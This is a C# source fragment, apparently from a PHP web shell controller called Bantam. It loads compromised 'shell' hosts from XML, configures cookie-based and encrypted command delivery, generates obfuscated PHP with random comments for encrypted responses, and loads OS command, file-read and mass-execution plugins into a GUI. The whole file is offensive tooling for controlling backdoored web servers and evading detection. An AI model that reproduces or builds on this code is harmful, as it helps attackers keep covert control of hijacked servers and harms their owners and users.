/// <summary>
/// Encrypts an array of plaintext bytes using AES-256 / "Rijndael"-256
/// </summary>
/// <param name="plainText"></param>
/// <param name="encryptionKey"></param>
/// <param name="encryptionIV"></param>
/// <returns></returns>
public static string EncryptBytesToRJ256ToBase64(byte[] plainText, string encryptionKey, string encryptionIV)
{
string result = string.Empty;
byte[] IV = Encoding.UTF8.GetBytes(encryptionIV);
byte[] Key = Encoding.UTF8.GetBytes(encryptionKey);
using (RijndaelManaged aes = BuildAesMode(Key, IV)) {
try {
using (MemoryStream memoryStream = new MemoryStream()) {
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateEncryptor(Key, IV), CryptoStreamMode.Write)) {
cryptoStream.Write(plainText, 0, plainText.Length);
cryptoStream.Close();
}
result = Convert.ToBase64String(memoryStream.ToArray());
}
}
catch (Exception e) {
LogHelper.AddGlobalLog("Failed to encrypt string - ( " + e.Message + " )", "Encryption routine failure", LogHelper.LOG_LEVEL.WARNING);
}
finally {
aes.Clear();
}
}
return(result);
}
/// <summary>
///
/// </summary>
/// <param name="ResponseEncryptionMode"></param>
/// <param name="encryptionKey">Generated in this function and passed out by reference to use for decryption of the response</param>
/// <param name="encryptionIV">Generated in this function and passed out by reference to use for decryption of the response</param>
/// <returns></returns>
public static string EncryptPhpVariableAndEcho(int ResponseEncryptionMode, ref string encryptionKey, ref string encryptionIV)
{
//todo make dynamic/random into config loaded once???
string varName = "$result";
encryptionIV = CryptoHelper.GetRandomEncryptionIV();
encryptionKey = CryptoHelper.GetRandomEncryptionKey();
string encryption = RandomPHPComment()
+ varName + " = base64_encode(" + varName + ");"
+ RandomPHPComment();
if (ResponseEncryptionMode == (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL)
{
encryption += OpenSSLEncryption(varName, encryptionKey, encryptionIV);
}
else if (ResponseEncryptionMode == (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.MCRYPT)
{
encryption += McryptEncryption(varName, encryptionKey, encryptionIV);
}
else
{
LogHelper.AddGlobalLog("Unknown encryption type selected.", "GUI Failure", LogHelper.LOG_LEVEL.ERROR);
return(string.Empty);
}
encryption += RandomPHPComment();
return(encryption);
}
/// <summary>
/// Decodes a base64 string to a string after validating and attempting to clean it
/// </summary>
/// <param name="str"></param>
/// <returns></returns>
public static string DecodeBase64ToString(string str)
{
if (string.IsNullOrEmpty(str))
{
return(string.Empty);
}
string cleanB64 = str;
if (!Regex.IsMatch(str, @"^[a-zA-Z0-9\+/]*={0,2}$"))
{
cleanB64 = Regex.Replace(str, "[^a-zA-Z0-9+=/]", string.Empty);
}
try {
return(Encoding.UTF8.GetString(Convert.FromBase64String(cleanB64)));
}
catch (Exception) {
LogHelper.AddGlobalLog("Unable to decode input string with base64 (" + str + ")", "Base64 Decode failure", LogHelper.LOG_LEVEL.WARNING);
return(string.Empty);
}
}
/// <summary>
/// Decrypts an encrypted array of bytes to a string, using AES-256 / "Rijndael"-256
/// </summary>
/// <param name="cipherText"></param>
/// <param name="encryptionKey"></param>
/// <param name="encryptionIV"></param>
/// <returns></returns>
public static string DecryptRJ256(byte[] cipherText, string encryptionKey, string encryptionIV)
{
string result = string.Empty;
byte[] Key = Encoding.UTF8.GetBytes(encryptionKey);
byte[] IV = Encoding.UTF8.GetBytes(encryptionIV);
using (RijndaelManaged aes = BuildAesMode(Key, IV)) {
try {
using (MemoryStream memoryStream = new MemoryStream(cipherText))
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(Key, IV), CryptoStreamMode.Read))
using (StreamReader streamReader = new StreamReader(cryptoStream)) {
result = streamReader.ReadToEnd();
}
}
catch (Exception e) {
LogHelper.AddGlobalLog("Failed to decrypt cipherText - ( " + e.Message + " )", "Decryption routine failure", LogHelper.LOG_LEVEL.WARNING);
}
finally {
aes.Clear();
}
}
return(result);
}
/// <summary>
/// Loads Shells into the UI from an XML file
/// </summary>
/// <param name="configFile"></param>
/// <returns></returns>
public async static Task LoadShells(string configFile)
{
if (File.Exists(configFile))
{
XmlDocument xmlDoc = new XmlDocument();
xmlDoc.Load(configFile);
XmlNodeList itemNodes = xmlDoc.SelectNodes("//servers/server");
if (itemNodes != null && itemNodes.Count > 0)
{
foreach (XmlNode itemNode in itemNodes)
{
string hostTarget = (itemNode.Attributes?["host"] != null) ? itemNode.Attributes["host"].Value : string.Empty;
string requestArg = (itemNode.Attributes?["request_arg"] != null) ? itemNode.Attributes["request_arg"].Value : string.Empty;
string requestMethod = (itemNode.Attributes?["request_method"] != null) ? itemNode.Attributes["request_method"].Value : string.Empty;
string ResponseEncryption = (itemNode.Attributes?["response_encryption"] != null) ? itemNode.Attributes["response_encryption"].Value : string.Empty;
string ResponseEncryptionMode = (itemNode.Attributes?["response_encryption_mode"] != null) ? itemNode.Attributes["response_encryption_mode"].Value : string.Empty;
string gzipRequest = (itemNode.Attributes?["gzip_request"] != null) ? itemNode.Attributes["gzip_request"].Value : string.Empty;
string requestEncryption = (itemNode.Attributes?["request_encryption"] != null) ? itemNode.Attributes["request_encryption"].Value : string.Empty;
string requestEncryptionKey = (itemNode.Attributes?["request_encryption_key"] != null) ? itemNode.Attributes["request_encryption_key"].Value : string.Empty;
string requestEncryptionIV = (itemNode.Attributes?["request_encryption_iv"] != null) ? itemNode.Attributes["request_encryption_iv"].Value : string.Empty;
string requestEncryptionIVVarName = (itemNode.Attributes?["request_encryption_iv_var_name"] != null) ? itemNode.Attributes["request_encryption_iv_var_name"].Value : string.Empty;
if (string.IsNullOrEmpty(hostTarget))
{
continue;
}
if (BantamMain.Shells.ContainsKey(hostTarget))
{
continue;
}
if (!BantamMain.Shells.TryAdd(hostTarget, new ShellInfo()))
{
LogHelper.AddGlobalLog("Unable to add (" + hostTarget + ") to shells from XML", "LoadShells failure", LogHelper.LOG_LEVEL.ERROR);
continue;
}
if (string.IsNullOrEmpty(requestArg) == false &&
requestArg != "command")
{
BantamMain.Shells[hostTarget].RequestArgName = requestArg;
}
if (string.IsNullOrEmpty(requestMethod) == false &&
requestMethod == "cookie")
{
BantamMain.Shells[hostTarget].SendDataViaCookie = true;
}
if (string.IsNullOrEmpty(ResponseEncryption) == false)
{
if (ResponseEncryption == "1")
{
BantamMain.Shells[hostTarget].ResponseEncryption = true;
}
else
{
BantamMain.Shells[hostTarget].ResponseEncryption = false;
}
}
if (string.IsNullOrEmpty(requestEncryption) == false && requestEncryption == "1")
{
BantamMain.Shells[hostTarget].RequestEncryption = true;
if (string.IsNullOrEmpty(requestEncryptionKey) == false)
{
BantamMain.Shells[hostTarget].RequestEncryptionKey = requestEncryptionKey;
}
if (string.IsNullOrEmpty(requestEncryptionIV) == false)
{
BantamMain.Shells[hostTarget].RequestEncryptionIV = requestEncryptionIV;
BantamMain.Shells[hostTarget].RequestEncryptionIVRequestVarName = string.Empty;
BantamMain.Shells[hostTarget].SendRequestEncryptionIV = false;
}
else
{
if (string.IsNullOrEmpty(requestEncryptionIVVarName) == false)
{
BantamMain.Shells[hostTarget].SendRequestEncryptionIV = true;
BantamMain.Shells[hostTarget].RequestEncryptionIV = string.Empty;
BantamMain.Shells[hostTarget].RequestEncryptionIVRequestVarName = requestEncryptionIVVarName;
}
}
}
if (string.IsNullOrEmpty(gzipRequest) == false)
{
if (gzipRequest == "1")
{
BantamMain.Shells[hostTarget].GzipRequestData = true;
}
else
{
BantamMain.Shells[hostTarget].GzipRequestData = false;
}
}
else
{
BantamMain.Shells[hostTarget].GzipRequestData = false;
}
if (string.IsNullOrEmpty(ResponseEncryptionMode) == false)
{
if (ResponseEncryptionMode == (CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL).ToString("D"))
{
BantamMain.Shells[hostTarget].ResponseEncryptionMode = (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL;
}
else if (ResponseEncryptionMode == CryptoHelper.RESPONSE_ENCRYPTION_TYPES.MCRYPT.ToString("D"))
{
BantamMain.Shells[hostTarget].ResponseEncryptionMode = (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.MCRYPT;
}
}
try {
BantamMain.Instance.InitializeShellData(hostTarget);
}
catch (Exception e) {
LogHelper.AddGlobalLog("Exception caught in XmlHelper.LoadShells ( " + e.Message + " )", "XML Load file Exception", LogHelper.LOG_LEVEL.INFO);
}
}
}
}
else
{
LogHelper.AddGlobalLog("Config file (" + configFile + ") is missing.", "Failed to located XML File", LogHelper.LOG_LEVEL.ERROR);
}
}
/// <summary>
/// Load settings, and features dynamically
/// Loads dynamic OS Command, and ReadFile execution vectors from XML settings file
/// </summary>
/// <param name="settingsFile"></param>
/// <returns></returns>
public async static Task LoadSettings(string settingsFile)
{
if (File.Exists(settingsFile))
{
XmlDocument xmlDoc = new XmlDocument();
xmlDoc.Load(settingsFile);
//Loading of ReadFile methods
XmlNodeList fileNodes = xmlDoc.SelectNodes("//settings/files/file");
if (fileNodes != null && fileNodes.Count > 0)
{
foreach (XmlNode itemNode in fileNodes)
{
string text = (itemNode.Attributes?["text"] != null) ? itemNode.Attributes["text"].Value : string.Empty;
string file = (itemNode.Attributes?["location"] != null) ? itemNode.Attributes["location"].Value : string.Empty;
bool isWindowsFile = (itemNode.Attributes?["is_windows"] != null && itemNode.Attributes?["is_windows"].Value == "1") ? true : false;
BantamMain.Instance.AddReadFileOptionToGUIFromXML(file, text, isWindowsFile);
}
}
else
{
LogHelper.AddGlobalLog("Could not find read file functions in settings file...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR);
}
//Loading of OS Command methods
XmlNodeList commandNodes = xmlDoc.SelectNodes("//settings/commands/command");
if (commandNodes != null && commandNodes.Count > 0)
{
foreach (XmlNode itemNode in commandNodes)
{
string text = (itemNode.Attributes?["text"] != null) ? itemNode.Attributes["text"].Value : string.Empty;
string command = (itemNode.Attributes?["command"] != null) ? itemNode.Attributes["command"].Value : string.Empty;
bool isWindowsFile = (itemNode.Attributes?["is_windows"] != null && itemNode.Attributes?["is_windows"].Value == "1") ? true : false;
BantamMain.Instance.AddOsCommandOptionToGUIFromXML(command, text, isWindowsFile);
}
}
else
{
LogHelper.AddGlobalLog("Could not find os commands in settings file...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR);
}
//Loading of plugins
XmlNodeList pluginNodes = xmlDoc.SelectNodes("//settings/plugins/plugin");
if (pluginNodes != null && pluginNodes.Count > 0)
{
foreach (XmlNode itemNode in pluginNodes)
{
string name = (itemNode.Attributes?["name"] != null) ? itemNode.Attributes["name"].Value : string.Empty;
bool mass_execute = (itemNode.Attributes?["mass_execute"] != null && itemNode.Attributes?["mass_execute"].Value == "1") ? true : false;
bool show_result = (itemNode.Attributes?["show_result"] != null && itemNode.Attributes?["show_result"].Value == "1") ? true : false;
if (mass_execute)
{
BantamMain.Instance.AddMassExecPluginOptionToGUIFromXML(name, show_result);
}
else
{
BantamMain.Instance.AddSingleExecPluginOptionToGUIFromXML(name, show_result);
}
}
}
else
{
LogHelper.AddGlobalLog("Could not find plugins in settings file...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR);
}
}
else
{
LogHelper.AddGlobalLog("Could not find settings file, features will be missing...", "SETTINGS FILE ERROR", LogHelper.LOG_LEVEL.ERROR);
}
}
